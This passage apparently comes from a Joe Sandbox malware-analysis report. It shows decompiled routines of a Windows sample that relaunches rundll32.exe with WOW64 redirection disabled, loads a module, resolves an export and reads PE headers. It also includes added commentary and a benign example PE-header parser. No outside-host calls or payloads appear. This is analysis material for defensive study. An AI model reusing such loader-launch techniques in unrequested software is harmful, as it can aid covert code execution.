                                              				_pop(_t64);
                                              				_pop(_t70);
                                              				_pop(_t57);
                                              				return E00761189(_t30, _t57, _v4 ^ _t73, _t62, _t64, _t70);
                                              			}

                                              APIs
                                              • GetCurrentProcess.KERNEL32(?,00762411,000000C1,?,00000000), ref: 00763A17
                                              • IsWow64Process.KERNEL32(00000000), ref: 00763A1E
                                              • GetNativeSystemInfo.KERNEL32(?), ref: 00763A52
                                              • GetSystemDirectoryW.KERNEL32(?,000000F6), ref: 00763A94
                                              • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00763AC8
                                              • memset.MSVCRT ref: 00763AD4
                                              • GetCommandLineW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00763AFA
                                              • CreateProcessW.KERNEL32(?,00000000), ref: 00763B08
                                              • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00763B14
                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00763B1E
                                              • CloseHandle.KERNEL32(?), ref: 00763B32
                                              • CloseHandle.KERNEL32(?), ref: 00763B3A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: Wow64$Process$CloseEnableHandleRedirectionSystem$CommandCreateCurrentDirectoryInfoLineNativeObjectSingleWaitmemset
                                              • String ID: D$rundll32.exe
                                              • API String ID: 233067003-895393680
                                              • Opcode ID: c6d551b07e595d2067825e1f4bbaf5cfc5147a9d87ffb47bcac61f8f40912770
                                              • Instruction ID: c7499379236501156b443786157e3959595c2307d3d9e41aff499e6b9092b750
                                              • Opcode Fuzzy Hash: c6d551b07e595d2067825e1f4bbaf5cfc5147a9d87ffb47bcac61f8f40912770
                                              • Instruction Fuzzy Hash: B04188B2900219AFDF60ABA0DC4DFDEB778AB04710F4444A6E90BE7151DA799E84CF64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              C-Code - Quality: 65%
                                              			E007639E5(void* __edx, intOrPtr _a4) {
                                              				signed int _v8;
                                              				short _v532;
                                              				char _v536;
                                              				struct _PROCESS_INFORMATION _v552;
                                              				struct _STARTUPINFOW _v620;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				intOrPtr _t25;
                                              				intOrPtr* _t26;
                                              				void* _t28;
                                              				void* _t29;
                                              				void* _t34;
                                              				void* _t35;
                                              				int _t47;
                                              				long _t49;
                                              				signed int _t56;
                                              				void* _t58;
                                              				void* _t60;
                                              				intOrPtr* _t61;
                                              				signed int _t62;
                                              
                                              				_t58 = __edx;
                                              				_v8 =  *0x765040 ^ _t62;
                                              				_t25 = _a4;
                                              				_v536 = 0;
                                              				_t26 = E007629B3(_t25); // executed
                                              				_t61 = _t26;
                                              				_t28 = GetCurrentProcess();
                                              				__imp__IsWow64Process(_t28,  &_v536);
                                              				if(_t28 == 0 || _v536 == 0) {
                                              					L12:
                                              					_t29 = 0;
                                              				} else {
                                              					_t56 = 8;
                                              					_v620.dwXCountChars = 0;
                                              					_t60 =  &(_v620.dwYCountChars);
                                              					memset(_t60, 0, _t56 << 2);
                                              					_t59 = _t60 + _t56;
                                              					__imp__GetNativeSystemInfo( &(_v620.dwXCountChars)); // executed
                                              					_t34 = 9;
                                              					if(_t34 != _v620.dwXCountChars || _t61 == 0x8664) {
                                              						_t35 = 6;
                                              						if(_t35 != _v620.dwXCountChars || _t61 == 0x200) {
                                              							if(GetSystemDirectoryW( &_v532, 0xf6) == 0 || E0076384E( &_v532, 0x105, L"rundll32.exe", 0) < 0) {
                                              								goto L12;
                                              							} else {
                                              								_t61 = __imp__Wow64EnableWow64FsRedirection;
                                              								 *_t61(0);
                                              								memset( &(_v620.lpReserved), 0, 0x40);
                                              								_v620.cb = 0x44;
                                              								_t47 = CreateProcessW( &_v532, GetCommandLineW(), 0, 0, 0, 0, 0, 0,  &_v620,  &_v552); // executed
                                              								if(_t47 == 0) {
                                              									goto L12;
                                              								} else {
                                              									 *_t61(1);
                                              									_t49 = WaitForSingleObject(_v552.hProcess, 0xffffffff);
                                              									_t61 = CloseHandle;
                                              									_t59 = _t49;
                                              									CloseHandle(_v552);
                                              									CloseHandle(_v552.hThread);
                                              									if(_t49 != 0) {
                                              										goto L12;
                                              									} else {
                                              										_t29 = 1;
                                              									}
                                              								}
                                              							}
                                              						} else {
                                              							goto L12;
                                              						}
                                              					} else {
                                              						goto L12;
                                              					}
                                              				}
                                              				return E00761189(_t29, 0, _v8 ^ _t62, _t58, _t59, _t61);
                                              			}

                                              APIs
                                                • Part of subcall function 007629B3: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 007629E3
                                                • Part of subcall function 007629B3: ReadFile.KERNELBASE(00000000,?,00000040,?,00000000), ref: 00762A03
                                                • Part of subcall function 007629B3: SetFilePointer.KERNELBASE(00000000,?,00000000,00000000), ref: 00762A1A
                                                • Part of subcall function 007629B3: ReadFile.KERNELBASE(00000000,?,000000F8,?,00000000), ref: 00762A37
                                                • Part of subcall function 007629B3: CloseHandle.KERNELBASE(00000000), ref: 00762A48
                                              • GetCurrentProcess.KERNEL32(?,00762411,000000C1,?,00000000), ref: 00763A17
                                              • IsWow64Process.KERNEL32(00000000), ref: 00763A1E
                                              • GetNativeSystemInfo.KERNEL32(?), ref: 00763A52
                                              • GetSystemDirectoryW.KERNEL32(?,000000F6), ref: 00763A94
                                              • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00763AC8
                                              • memset.MSVCRT ref: 00763AD4
                                              • GetCommandLineW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00763AFA
                                              • CreateProcessW.KERNEL32(?,00000000), ref: 00763B08
                                              • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00763B14
                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00763B1E
                                              • CloseHandle.KERNEL32(?), ref: 00763B32
                                              • CloseHandle.KERNEL32(?), ref: 00763B3A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: Wow64$File$CloseHandleProcess$CreateEnableReadRedirectionSystem$CommandCurrentDirectoryInfoLineNativeObjectPointerSingleWaitmemset
                                              • String ID: D$rundll32.exe
                                              • API String ID: 446403646-895393680
                                              • Opcode ID: ed04ffe63f65c493cc10eb93a0561e7b9018b948f6d17a727cb5f8daf985c1f1
                                              • Instruction ID: 810c5eae72eecb15a79b0758322c1f03f74acee0b66eb0c2bb416e565832b32c
                                              • Opcode Fuzzy Hash: ed04ffe63f65c493cc10eb93a0561e7b9018b948f6d17a727cb5f8daf985c1f1
                                              • Instruction Fuzzy Hash: 16316B7290021DAEDF60AFA0DD8CBDE777CAB04750F4445A6E90EE2151DA789EC8CF54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              C-Code - Quality: 82%
                                              			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                              				long _t28;
                                              				signed int _t31;
                                              				int* _t32;
                                              				int _t33;
                                              				int _t35;
                                              				intOrPtr* _t36;
                                              				void* _t42;
                                              				signed int _t47;
                                              				signed int _t48;
                                              				signed int _t49;
                                              				intOrPtr _t51;
                                              				long _t63;
                                              				intOrPtr _t65;
                                              				void* _t67;
                                              
                                              				E00761593();
                                              				_push(0x5c);
                                              				_push(0x7618a0);
                                              				E00761E0C(__ebx, __edi, __esi);
                                              				 *(_t67 - 0x1c) = 0;
                                              				 *((intOrPtr*)(_t67 - 4)) = 0;
                                              				GetStartupInfoW(_t67 - 0x6c);
                                              				 *((intOrPtr*)(_t67 - 4)) = 0xfffffffe;
                                              				 *((intOrPtr*)(_t67 - 4)) = 1;
                                              				_t63 =  *( *[fs:0x18] + 4);
                                              				 *((intOrPtr*)(_t67 - 0x20)) = 0;
                                              				while(1) {
                                              					_t28 = InterlockedCompareExchange(0x765068, _t63, 0);
                                              					if(_t28 == 0) {
                                              						break;
                                              					}
                                              					__eflags = _t28 - _t63;
                                              					if(__eflags != 0) {
                                              						Sleep(0x3e8);
                                              						continue;
                                              					} else {
                                              						_t65 = 1;
                                              						 *((intOrPtr*)(_t67 - 0x20)) = 1;
                                              					}
                                              					L3:
                                              					if( *0x765064 == _t65) {
                                              						_push(0x1f);
                                              						L00763E59();
                                              						goto L6;
                                              					} else {
                                              						if( *0x765064 != 0) {
                                              							 *0x7653b4 = _t65;
                                              							goto L6;
                                              						} else {
                                              							 *0x765064 = _t65;
                                              							_t42 = E00761763(0x761890, 0x76189c); // executed
                                              							if(_t42 != 0) {
                                              								L33:
								 *((intOrPtr*)(_t67 - 4)) = 0xfffffffe;
								_t33 = 0xff; // initializer failed: return 255
                                              								goto L34;
                                              							} else {
                                              								L6:
								if( *0x765064 == _t65) {
									_push(0x76188c);
									_push(0x761884); // executed
									L00761580(); // executed; _initterm over the C++ constructor table (see _initterm.MSVCRT ref 0076182E below)
									 *0x765064 = 2; // state = initialized
                                              								}
                                              								if( *((intOrPtr*)(_t67 - 0x20)) == 0) {
                                              									InterlockedExchange(0x765068, 0);
                                              								}
                                              								if( *0x7653b0 != 0) {
                                              									_push(0x7653b0);
                                              									_t31 = E00763DC5(0, 0x765068, _t65, __eflags);
                                              									__eflags = _t31;
                                              									if(_t31 != 0) {
										 *0x7653b0(0, 2, 0); // dynamic TLS init callback(NULL, DLL_THREAD_ATTACH, NULL)
                                              									}
                                              								}
								_t32 = __imp___wcmdln; // wide command line from the CRT
								if( *_t32 == 0) {
                                              									goto L33;
                                              								} else {
                                              									_t35 =  *_t32;
									while(1) { // skip the program name; 0x22 (") toggles in-quote state so quoted paths with spaces are skipped whole
										 *(_t67 - 0x24) = _t35;
										_t47 =  *_t35 & 0x0000ffff;
                                              										if(_t47 <= 0x20) {
                                              											goto L16;
                                              										}
                                              										L14:
                                              										if(_t47 == 0x22) {
                                              											__eflags =  *(_t67 - 0x1c);
                                              											 *(_t67 - 0x1c) = 0 |  *(_t67 - 0x1c) == 0x00000000;
                                              										}
                                              										_t35 = _t35 + 2;
                                              										continue;
                                              										L16:
                                              										__eflags = _t47;
                                              										if(_t47 != 0) {
                                              											__eflags =  *(_t67 - 0x1c);
                                              											if( *(_t67 - 0x1c) != 0) {
                                              												goto L14;
                                              											} else {
                                              												goto L18;
                                              											}
                                              											while(1) {
                                              												L18:
                                              												_t48 =  *_t35 & 0x0000ffff;
                                              												__eflags = _t48;
                                              												if(_t48 == 0) {
                                              													break;
                                              												}
                                              												__eflags = _t48 - 0x20;
                                              												if(_t48 <= 0x20) {
                                              													_t35 = _t35 + 2;
                                              													 *(_t67 - 0x24) = _t35;
                                              													continue;
                                              												}
                                              												break;
                                              											}
											__eflags =  *(_t67 - 0x40) & 0x00000001; // STARTUPINFOW.dwFlags & STARTF_USESHOWWINDOW
											if(( *(_t67 - 0x40) & 0x00000001) != 0) {
												_t49 =  *(_t67 - 0x3c) & 0x0000ffff; // STARTUPINFOW.wShowWindow
											} else {
												_t49 = 0xa; // SW_SHOWDEFAULT
											}
											E00761203(0x760000, 0, _t35, _t49); // executed; wWinMain(hInstance = image base, NULL, lpCmdLine, nShowCmd): the sample's real entry point
											 *0x765078 = _t35; // wWinMain return value
                                              											__eflags =  *0x765050;
                                              											if( *0x765050 != 0) {
                                              												_t33 =  *0x765078;
                                              												L34:
                                              												return E007619CA(_t33);
                                              											} else {
												exit(_t35); // exit with wWinMain's return value
                                              												_t36 =  *((intOrPtr*)(_t67 - 0x14));
                                              												_t51 =  *((intOrPtr*)( *_t36));
                                              												 *((intOrPtr*)(_t67 - 0x28)) = _t51;
                                              												_push(_t36);
                                              												_push(_t51);
                                              												L00763D37();
                                              												return _t36;
                                              											}
                                              											goto L38;
                                              										}
                                              										goto L18;
                                              									}
                                              								}
                                              							}
                                              						}
                                              					}
                                              					L38:
                                              				}
                                              				_t65 = 1;
                                              				goto L3;
                                              			}

                                              Instruction address column for the listing above: one entry per decompiled line, addresses in 0x0076178c-0x007619c9 and 0x00762317-0x00762333 (0x00000000 for lines with no corresponding instruction).


                                              APIs
                                                • Part of subcall function 00761593: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 007615C1
                                                • Part of subcall function 00761593: GetCurrentProcessId.KERNEL32 ref: 007615CD
                                                • Part of subcall function 00761593: GetCurrentThreadId.KERNEL32 ref: 007615D5
                                                • Part of subcall function 00761593: GetTickCount.KERNEL32 ref: 007615DD
                                                • Part of subcall function 00761593: QueryPerformanceCounter.KERNEL32(?), ref: 007615E9
                                              • GetStartupInfoW.KERNEL32(?,007618A0,0000005C), ref: 007617A9
                                              • InterlockedCompareExchange.KERNEL32(00765068,?,00000000), ref: 007617D1
                                              • _initterm.MSVCRT ref: 0076182E
                                              • InterlockedExchange.KERNEL32(00765068,00000000), ref: 00761846
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: CurrentExchangeInterlockedTime$CompareCountCounterFileInfoPerformanceProcessQueryStartupSystemThreadTick_initterm
                                              • String ID: hPv
                                              • API String ID: 812915189-3126381271
                                              • Opcode ID: a78e14fbb54df5cf40034289e7eed2eeff644aa2921b503ee3ef2b353475eb78
                                              • Instruction ID: cc772dfee68b149af4550054c27707f062f071e454221a42b5d65cd29abe6b13
                                              • Opcode Fuzzy Hash: a78e14fbb54df5cf40034289e7eed2eeff644aa2921b503ee3ef2b353475eb78
                                              • Instruction Fuzzy Hash: 6E41DDB1A04346DFCB24AFA0D89D67D77B4EB05721FD8412AE903A7291C7BC9C40EB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 161 761b87-761baa call 7614bd 163 761baf-761bb4 161->163 164 761bb6-761bcd call 761c02 163->164 165 761bf5-761bfa 163->165 168 762494-7624a2 call 76389e 164->168 169 761bd3-761bdd 164->169 173 7624a7-7624b0 FreeLibrary 168->173 171 762174-762179 169->171 172 761be3-761bf4 169->172 171->172 174 76217f-762182 171->174 172->165 174->172 175 762188-7621b7 lstrlenW WideCharToMultiByte LocalAlloc 174->175 176 76247f-762492 call 76389e 175->176 177 7621bd-7621d6 WideCharToMultiByte 175->177 176->173 177->172
                                              C-Code - Quality: 70%
                                              			E00761B87(void* __edx, void* __eflags, intOrPtr _a4, char* _a8, int _a12, short* _a16, struct HINSTANCE__** _a20, intOrPtr* _a24, char** _a28) {
                                              				int _v8;
                                              				char _v12;
                                              				struct HINSTANCE__* _v16;
                                              				intOrPtr _v20;
                                              				struct HINSTANCE__* _t36;
                                              				intOrPtr _t38;
                                              				long _t44;
                                              				char* _t45;
                                              				short* _t51;
                                              				int _t61;
                                              
                                              				_t57 = __edx;
                                              				 *_a20 = 0;
                                              				 *_a24 = 0;
                                              				_v8 = 0;
                                              				 *_a28 = 0; // executed
				_t36 = E007614BD(_a4, _a8); // executed; loads the module (LoadLibraryExW with flag 0x8 = LOAD_WITH_ALTERED_SEARCH_PATH, then SetProcessDEPPolicy, per the subcall APIs below)
                                              				_v16 = _t36;
                                              				if(_t36 != 0) {
                                              					_v12 = 0;
					_t38 = E00761C02(_t36, _a12,  &_v12); // resolves the named export via GetProcAddress; _v12 is a flag set by the subcall
                                              					_v20 = _t38;
                                              					if(_t38 == 0) {
                                              						E0076389E(__edx, _a4, 0x400, _a8, _a12);
                                              						goto L12;
                                              					} else {
                                              						_v8 = 1;
                                              						if(_v12 != 0) {
                                              							_t51 = _a16;
                                              							if(_t51 == 0 ||  *_t51 == 0) {
                                              								goto L3;
                                              							} else {
								_t61 = lstrlenW(_t51) + 1;
								_t44 = WideCharToMultiByte(0, 0x400, _t51, _t61, 0, 0, 0, 0); // CP_ACP, WC_NO_BEST_FIT_CHARS; size query
								_a12 = _t44;
								_t45 = LocalAlloc(0, _t44); // LMEM_FIXED buffer for the ANSI copy
                                              								_a8 = _t45;
                                              								_push(0);
                                              								if(_t45 == 0) {
                                              									_push(_a16);
                                              									_push(0x300);
                                              									_push(_a4);
                                              									E0076389E(_t57);
                                              									_v8 = 0;
                                              									L12:
									FreeLibrary(_v16); // failure path: unload the module before returning 0
                                              									goto L4;
                                              								} else {
									WideCharToMultiByte(0, 0x400, _a16, _t61, _t45, _a12, 0, ??); // convert the argument string into the buffer
									 *_a28 = _a8; // hand the ANSI argument string back to the caller
                                              									goto L3;
                                              								}
                                              							}
                                              							L13:
                                              						} else {
                                              							L3:
                                              							 *_a20 = _v16;
                                              							 *_a24 = _v20;
                                              						}
                                              					}
                                              					L4:
                                              				}
                                              				return _v8;
                                              				goto L13;
                                              			}

                                              Instruction address column for the listing above: one entry per decompiled line, addresses in 0x00761b87-0x00761bfa and 0x00762174-0x007624aa (0x00000000 for lines with no corresponding instruction).


                                              APIs
                                                • Part of subcall function 007614BD: LoadLibraryExW.KERNELBASE(?,00000000,00000008,00000000,00000000,00000001), ref: 007614E7
                                                • Part of subcall function 007614BD: RtlImageNtHeader.NTDLL(00000000), ref: 007614FC
                                                • Part of subcall function 007614BD: SetProcessDEPPolicy.KERNEL32(00000003), ref: 00761513
                                                • Part of subcall function 00761C02: lstrlenW.KERNEL32(?,00000000,00000000,00000001,?,?,00761BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000), ref: 00761C27
                                                • Part of subcall function 00761C02: LocalAlloc.KERNEL32(00000000,00000002,?,00761BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00761C38
                                                • Part of subcall function 00761C02: WideCharToMultiByte.KERNEL32(00000000,00000400,?,00000001,00000000,00000000,00000000,00000000,?,00761BC8,00000000,00000000,?,00000000,00000001,?), ref: 00761C54
                                                • Part of subcall function 00761C02: lstrlenA.KERNEL32(00000000,?,00761BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00761C5F
                                                • Part of subcall function 00761C02: GetProcAddress.KERNEL32(?,00000000,?,00761BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00761C79
                                                • Part of subcall function 00761C02: LocalFree.KERNEL32(00000000,?,00761BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00761C87
                                              • lstrlenW.KERNEL32(00000001,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?), ref: 00762189
                                              • WideCharToMultiByte.KERNEL32(00000000,00000400,00000001,00000001,00000000,00000000,00000000,00000000), ref: 007621A4
                                              • LocalAlloc.KERNEL32(00000000,00000000), ref: 007621AB
                                              • WideCharToMultiByte.KERNEL32(00000000,00000400,00000000,00000001,00000000,?,00000000,00000000), ref: 007621CC
                                              • FreeLibrary.KERNEL32(?,?,00000400,?,00000000,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?), ref: 007624AA
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: ByteCharLocalMultiWidelstrlen$AllocFreeLibrary$AddressHeaderImageLoadPolicyProcProcess
                                              • String ID:
                                              • API String ID: 2400347670-0
                                              • Opcode ID: 8e66d173d8fdf4bda12c427b96ee21b3238e1287ff1f1afc9446f9c2779ed6eb
                                              • Instruction ID: 9e6352f2698d034e8de3580f1e45a52f2e1f3317cd506f5b7269ec10e41130f7
                                              • Opcode Fuzzy Hash: 8e66d173d8fdf4bda12c427b96ee21b3238e1287ff1f1afc9446f9c2779ed6eb
                                              • Instruction Fuzzy Hash: 9F3132B0901258EFCB129FA4CC88DAE7FB8FF09750F148045F90AA7220D7789A51CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

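The next decompiled routine, E007629B3, opens a file read-only, reads the 0x40-byte IMAGE_DOS_HEADER, checks e_magic against 0x5a4d ("MZ"), seeks to e_lfanew, reads 0xf8 bytes (IMAGE_NT_HEADERS32) and returns the 16-bit value four bytes past the PE signature, which is IMAGE_FILE_HEADER.Machine. The following is an added example, not code from the analysed sample or from Joe Sandbox: a bounds-checked in-memory version of that header walk, with a constructed (not real) PE header as input so it runs offline. The names pe_machine and build_fake_pe are hypothetical; the extra "PE\0\0" signature check and the e_lfanew bounds check are additions the sample does not make.

```c
/*
 * Added example: userland equivalent of the DOS -> NT header walk in
 * E007629B3 (read "MZ" header, follow e_lfanew, read IMAGE_FILE_HEADER.Machine).
 * Operates on a byte buffer instead of a file handle; input is constructed.
 */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define DOS_HEADER_SIZE   0x40   /* sizeof(IMAGE_DOS_HEADER), the sample's first ReadFile size */
#define NT_HEADERS32_SIZE 0xf8   /* sizeof(IMAGE_NT_HEADERS32), the sample's second ReadFile size */
#define E_LFANEW_OFFSET   0x3c   /* offset of e_lfanew in IMAGE_DOS_HEADER */
#define IMAGE_FILE_MACHINE_I386  0x014c
#define IMAGE_FILE_MACHINE_AMD64 0x8664

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Returns IMAGE_FILE_HEADER.Machine, or 0 if buf does not hold a parseable PE header
 * (the decompiled routine likewise leaves its result at 0 on any failure). */
uint16_t pe_machine(const uint8_t *buf, size_t len)
{
    if (buf == NULL || len < DOS_HEADER_SIZE) return 0;
    if (rd16(buf) != 0x5a4d) return 0;                       /* e_magic == "MZ" */
    uint32_t e_lfanew = rd32(buf + E_LFANEW_OFFSET);
    /* The sample hands e_lfanew straight to SetFilePointer; bounds-check it here. */
    if (e_lfanew > len || len - e_lfanew < NT_HEADERS32_SIZE) return 0;
    const uint8_t *nt = buf + e_lfanew;
    if (rd32(nt) != 0x00004550) return 0;                    /* "PE\0\0", not checked by the sample */
    return rd16(nt + 4);                                     /* IMAGE_FILE_HEADER.Machine */
}

/* Builds a constructed minimal header: "MZ", e_lfanew = 0x80, "PE\0\0", Machine. Returns bytes written. */
size_t build_fake_pe(uint8_t *out, size_t cap, uint16_t machine)
{
    const uint32_t lfanew = 0x80;
    size_t total = lfanew + NT_HEADERS32_SIZE;
    if (out == NULL || cap < total) return 0;
    memset(out, 0, total);
    out[0] = 'M'; out[1] = 'Z';
    out[E_LFANEW_OFFSET] = (uint8_t)lfanew;                  /* little-endian; upper bytes stay 0 */
    memcpy(out + lfanew, "PE\0\0", 4);
    out[lfanew + 4] = (uint8_t)(machine & 0xff);
    out[lfanew + 5] = (uint8_t)(machine >> 8);
    return total;
}

/* Parse a freshly constructed header with the given Machine value. */
uint16_t demo_machine(uint16_t machine)
{
    uint8_t b[0x200];
    size_t n = build_fake_pe(b, sizeof b, machine);
    return pe_machine(b, n);
}

/* Same header, but with e_lfanew corrupted to 0xffffffff: must be rejected, not followed. */
uint16_t demo_bad_lfanew(void)
{
    uint8_t b[0x200];
    size_t n = build_fake_pe(b, sizeof b, IMAGE_FILE_MACHINE_I386);
    memset(b + E_LFANEW_OFFSET, 0xff, 4);
    return pe_machine(b, n);
}

int main(void)
{
    printf("x86 header  -> machine 0x%04x\n", demo_machine(IMAGE_FILE_MACHINE_I386));
    printf("x64 header  -> machine 0x%04x\n", demo_machine(IMAGE_FILE_MACHINE_AMD64));
    printf("bad lfanew  -> machine 0x%04x\n", demo_bad_lfanew());
    return 0;
}
```

The returned Machine value (0x014c for x86, 0x8664 for x64) is what a loader consults before deciding whether a file can be loaded into the current process; the decompiled routine performs the same read without validating e_lfanew or the PE signature, so a crafted file with an out-of-range e_lfanew simply makes SetFilePointer or the second ReadFile fail and the function return 0.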
                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 199 7629b3-7629ee CreateFileW 200 7629f0-762a07 ReadFile 199->200 201 762a4f-762a5f call 761189 199->201 202 762a47-762a4e CloseHandle 200->202 203 762a09-762a12 200->203 202->201 203->202 205 762a14-762a23 SetFilePointer 203->205 205->202 207 762a25-762a3b ReadFile 205->207 207->202 208 762a3d-762a44 207->208 208->202
                                              C-Code - Quality: 81%
                                              			E007629B3(WCHAR* _a4) {
                                              				signed int _v8;
                                              				long _v12;
                                              				void _v72;
                                              				struct _OVERLAPPED* _v76;
                                              				long _v80;
                                              				signed short _v324;
                                              				void _v328;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				void* _t17;
                                              				int _t22;
                                              				long _t25;
                                              				int _t28;
                                              				void* _t30;
                                              				void* _t33;
                                              				void* _t34;
                                              				signed int _t37;
                                              
                                              				_v8 =  *0x765040 ^ _t37;
                                              				_v76 = 0;
                                              				_t17 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                              				_t30 = _t17;
                                              				if(_t30 == 0xffffffff) {
                                              					L7:
                                              					return E00761189(_v76, _t30, _v8 ^ _t37, _t33, _t34, 0);
                                              				}
                                              				_push(_t34);
                                              				_t22 = ReadFile(_t30,  &_v72, 0x40,  &_v80, 0); // executed
                                              				if(_t22 != 0 && 0x5a4d == _v72) {
                                              					_t25 = SetFilePointer(_t30, _v12, 0, 0); // executed
                                              					if(_t25 != 0xffffffff) {
                                              						_t28 = ReadFile(_t30,  &_v328, 0xf8,  &_v80, 0); // executed
                                              						if(_t28 != 0) {
                                              							_v76 = _v324 & 0x0000ffff;
                                              						}
                                              					}
                                              				}
                                              				CloseHandle(_t30); // executed
                                              				_pop(_t34);
                                              				goto L7;
                                              			}

                                              APIs
                                              • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 007629E3
                                              • ReadFile.KERNELBASE(00000000,?,00000040,?,00000000), ref: 00762A03
                                              • SetFilePointer.KERNELBASE(00000000,?,00000000,00000000), ref: 00762A1A
                                              • ReadFile.KERNELBASE(00000000,?,000000F8,?,00000000), ref: 00762A37
                                              • CloseHandle.KERNELBASE(00000000), ref: 00762A48
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: File$Read$CloseCreateHandlePointer
                                              • String ID:
                                              • API String ID: 3856724686-0
                                              • Opcode ID: 291c7e4154f9a9d84f66ad8be80d5b60158fb9b749a1e8fd102332d77c548cbd
                                              • Instruction ID: 7dd4653de67bcd7b11cd29b19fd169c83b27129a7352bf91ca499f9f1d9b9ee0
                                              • Opcode Fuzzy Hash: 291c7e4154f9a9d84f66ad8be80d5b60158fb9b749a1e8fd102332d77c548cbd
                                              • Instruction Fuzzy Hash: 2311B171500218BADB20DBA4CC88FEE7BACEF05710F144111FD06E6091D6B8DD46CB64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00761593() {
                                              				struct _FILETIME _v12;
                                              				signed int _v16;
                                              				union _LARGE_INTEGER _v20;
                                              				signed int _t14;
                                              				signed int _t16;
                                              				signed int _t17;
                                              				signed int _t18;
                                              				signed int _t22;
                                              				signed int _t23;
                                              				signed int _t32;
                                              
                                              				_t14 =  *0x765040;
                                              				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
                                              				_v12.dwHighDateTime = _v12.dwHighDateTime & 0x00000000;
                                              				if(_t14 != 0xbb40e64e) {
                                              					if((0xffff0000 & _t14) == 0) {
                                              						goto L1;
                                              					}
                                              					_t23 =  !_t14;
                                              					 *0x765044 = _t23;
                                              					return _t23;
                                              				}
                                              				L1:
                                              				GetSystemTimeAsFileTime( &_v12);
                                              				_t16 = GetCurrentProcessId();
                                              				_t17 = GetCurrentThreadId();
                                              				_t18 = GetTickCount();
                                              				QueryPerformanceCounter( &_v20);
                                              				_t22 = _v16 ^ _v20.LowPart;
                                              				_t32 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t16 ^ _t17 ^ _t18 ^ _t22;
